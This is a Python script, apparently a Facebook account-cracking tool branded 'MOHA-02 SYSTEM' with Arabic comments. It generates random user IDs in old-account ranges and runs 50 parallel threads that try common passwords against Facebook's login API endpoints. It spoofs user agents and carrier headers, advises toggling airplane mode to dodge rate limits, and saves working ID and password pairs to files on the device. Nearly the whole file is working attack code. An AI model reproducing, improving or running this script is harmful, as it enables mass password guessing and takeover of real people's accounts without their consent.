import os, re, time, uuid, hashlib, random, string, requests, sys, json, urllib, webbrowser
from bs4 import BeautifulSoup
from random import randint as rr
from concurrent.futures import ThreadPoolExecutor as moha_speed
from datetime import datetime

# الألوان التي طلبتها (النيون والذهبي)
G = '\033[1;92m'  # أخضر نيون
Y = '\033[1;93m'  # أصفر ذهبي
W = '\033[1;97m'  # أبيض
R = '\033[1;91m'  # أحمر
B = '\033[1;94m'  # أزرق

loop = 0
oks = []
cps = []
twf = []

def clear():
    os.system('clear' if os.name != 'nt' else 'cls')

def linex():
    print(f'{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')

def channel():
    webbrowser.open('https://t.me/MOHA_02_SYSTEM')

def moha_banner():
    clear()
    print(f"""
{G} ██████╗██╗  ██╗██╗     ███████╗███████╗
{G}██╔════╝██║  ██║██║     ██╔════╝██╔════╝
{Y}██║     ███████║██║     █████╗  █████╗  
{Y}██║     ██╔══██║██║     ██╔══╝  ██╔══╝  
{G}╚██████╗██║  ██║███████╗███████╗██║     
{G} ╚═════╝╚═╝  ╚═╝╚══════╝╚══════╝╚═╝     
{Y}     M O H A - 0 2   S Y S T E M   V 3.5
{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
{Y} [✓] DEVELOPER : MOHA AL-SHALFAWI
{Y} [✓] ROLE      : ELECTRONIC MARKETER
{G}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━""")

def ua_generator():
    ver = random.randint(100, 140)
    build = random.randint(4000, 7000)
    patch = random.randint(10, 200)
    return f"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{ver}.0.{build}.{patch} Safari/537.36"

def get_year(uid):
    if len(uid) == 15:
        if uid[:10] in ['1000000000', '100000000', '10000000']: return '2009'
        elif uid[:6] in ['100001']: return '2010'
        elif uid[:6] in ['100002', '100003']: return '2011'
        elif uid[:6] in ['100004']: return '2012'
        elif uid[:6] in ['100005', '100006']: return '2013'
        elif uid[:6] in ['100007', '100008']: return '2014'
        elif uid[:6] in ['100009']: return '2015'
        elif uid[:5] in ['10001']: return '2016'
        elif uid[:5] in ['10002']: return '2017'
        elif uid[:5] in ['10003']: return '2018'
        elif uid[:5] in ['10004']: return '2019'
        elif uid[:5] in ['10005']: return '2020'
        elif uid[:5] in ['10006']: return '2021'
    elif len(uid) in [9, 10]: return '2008'
    elif len(uid) == 8: return '2007'
    elif len(uid) == 7: return '2006'
    return 'UNKNOWN'

def main_menu():
    channel()
    moha_banner()
    print(f' {G}[01] {Y}CRACK OLD ACCOUNTS (MIX SERIES)')
    print(f' {G}[02] {Y}CRACK 2009-2010 SPECIAL SERIES')
    print(f' {G}[03] {Y}CRACK 2011-2014 SPECIAL SERIES')
    print(f' {G}[00] {R}EXIT SYSTEM')
    linex()
    choice = input(f' {G}[?] {W}SELECT OPTION : ')
    if choice in ['1', '01']:
        start_crack('all')
    elif choice in ['2', '02']:
        start_crack('old')
    elif choice in ['3', '03']:
        start_crack('mid')
    else:
        sys.exit()

def start_crack(mode):
    user = []
    moha_banner()
    if mode == 'all':
        print(f' {G}[+] {Y}EXAMPLE: 10000, 20000, 50000')
    else:
        print(f' {G}[+] {Y}EXAMPLE: 5000, 10000')
    
    try:
        limit = int(input(f' {G}[?] {W}ENTER LIMIT : '))
    except:
        limit = 5000
    
    linex()
    print(f' {G}[01] {Y}METHOD M1 (GRAPH API)')
    print(f' {G}[02] {Y}METHOD M2 (B-API FAST)')
    linex()
    meth = input(f' {G}[?] {W}SELECT METHOD : ')
    
    if mode == 'all':
        star = '10000'
        for _ in range(limit):
            user.append(star + str(random.randint(1111111111, 9999999999)))
    elif mode == 'old':
        star = '100000'
        for _ in range(limit):
            user.append(star + str(random.randint(111111111, 999999999)))
    
    moha_banner()
    print(f' {G}[+] {W}TOTAL IDS  : {G}{len(user)}')
    print(f' {G}[+] {W}METHOD USE : {G}M-{meth}')
    print(f' {G}[+] {Y}HINT: USE AIRPLANE MODE EVERY 5 MINS')
    linex()
    
    with moha_speed(max_workers=50) as moha_pool:
        for uid in user:
            if meth in ['1', '01']:
                moha_pool.submit(login_m1, uid)
            else:
                moha_pool.submit(login_m2, uid)

def login_m1(uid):
    global loop, oks, cps
    sys.stdout.write(f'\r {W}[MOHA-02] {G}{loop}{W}|{G}OK:{len(oks)}{W}|{R}CP:{len(cps)} '),
    sys.stdout.flush()
    
    passwords = ['123456', '1234567', '12345678', '123456789', 'password']
    for pw in passwords:
        try:
            ua = ua_generator()
            data = {
                "adid": str(uuid.uuid4()),
                "format": "json",
                "device_id": str(uuid.uuid4()),
                "email": uid,
                "password": pw,
                "generate_session_cookies": "1",
                "community_id": "0",
                "client_country_code": "US",
                "method": "auth.login",
                "api_key": "882a8490361da98702bf97a021ddc14d",
                "fb_api_req_friendly_name": "authenticate"
            }
            head = {
                "User-Agent": ua,
                "Content-Type": "application/x-www-form-urlencoded",
                "Host": "graph.facebook.com",
                "X-FB-Net-HNI": str(random.randint(20000, 40000)),
                "X-FB-SIM-HNI": str(random.randint(20000, 40000)),
                "X-FB-Connection-Type": "MOBILE.LTE",
                "X-Tigon-Is-Retry": "False",
                "x-fb-session-id": "nid=jiZ+yNNBgbwC;pid=Main;tid=132;",
                "X-FB-Friendly-Name": "authenticate",
                "X-FB-HTTP-Engine": "Liger"
            }
            url = "https://graph.facebook.com/auth/login"
            res = requests.post(url, data=data, headers=head, verify=False).json()
            
            if "session_key" in res:
                print(f'\r{G} [MOHA-OK] {uid} | {pw} | {get_year(uid)}{W}')
                oks.append(uid)
                open('/sdcard/MOHA-OK.txt', 'a').write(f'{uid}|{pw}\n')
                break
            elif "www.facebook.com" in res.get("error", {}).get("message", ""):
                print(f'\r{Y} [MOHA-CP] {uid} | {pw} | {get_year(uid)}{W}')
                cps.append(uid)
                open('/sdcard/MOHA-CP.txt', 'a').write(f'{uid}|{pw}\n')
                break
        except:
            pass
    loop += 1
def login_m2(uid):
    global loop, oks, cps
    sys.stdout.write(f'\r {W}[MOHA-02] {G}{loop}{W}|{G}OK:{len(oks)}{W}|{R}CP:{len(cps)} '),
    sys.stdout.flush()
    
    # قائمة الباسووردات المقترحة (يمكنك زيادتها)
    passwords = ['123456', '123123', '1234567', '12345678', '123456789', 'password', '112233', '223344']
    
    try:
        for pw in passwords:
            ua = ua_generator()
            session = requests.Session()
            # محرك سريع يعتمد على b-api
            url = f"https://b-api.facebook.com/method/auth.login?format=json&email={uid}&password={pw}&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&method=GET&locale=en_US&client_country_code=US&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate"
            
            headers = {
                'x-fb-connection-bandwidth': str(random.randint(20000000, 30000000)),
                'x-fb-sim-hni': str(random.randint(20000, 40000)),
                'x-fb-net-hni': str(random.randint(20000, 40000)),
                'x-fb-connection-quality': 'EXCELLENT',
                'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
                'user-agent': ua,
                'content-type': 'application/x-www-form-urlencoded',
                'x-fb-http-engine': 'Liger'
            }
            
            response = session.get(url, headers=headers).json()
            
            if "session_key" in response or "EAAA" in str(response):
                print(f'\r{G} [MOHA-OK] {uid} | {pw} | {get_year(uid)}{W}')
                oks.append(uid)
                with open('/sdcard/MOHA-OK.txt', 'a') as f:
                    f.write(f'{uid}|{pw}\n')
                break
            elif "www.facebook.com" in response.get("error", {}).get("message", ""):
                print(f'\r{Y} [MOHA-CP] {uid} | {pw} | {get_year(uid)}{W}')
                cps.append(uid)
                with open('/sdcard/MOHA-CP.txt', 'a') as f:
                    f.write(f'{uid}|{pw}\n')
                break
            elif "Calls to this api have exceeded the rate limit" in str(response):
                # إذا واجهت حظر مؤقت، انتظر قليلاً أو اطلب تغيير وضع الطيران
                time.sleep(5)
        
        loop += 1
    except:
        pass

def setup_system():
    # التأكد من وجود المجلدات اللازمة لحفظ النتائج
    if not os.path.exists('/sdcard'):
        # للمحاكيات أو الأنظمة التي لا تملك الوصول لـ sdcard
        pass
    
    # تثبيت المكتبات الناقصة تلقائياً
    try:
        import bs4, requests, concurrent.futures
    except ImportError:
        os.system('pip install requests bs4 futures')

# تشغيل النظام
if __name__ == '__main__':
    setup_system()
    try:
        main_menu()
    except Exception as e:
        print(f"\n{R} [!] Error: {e}")
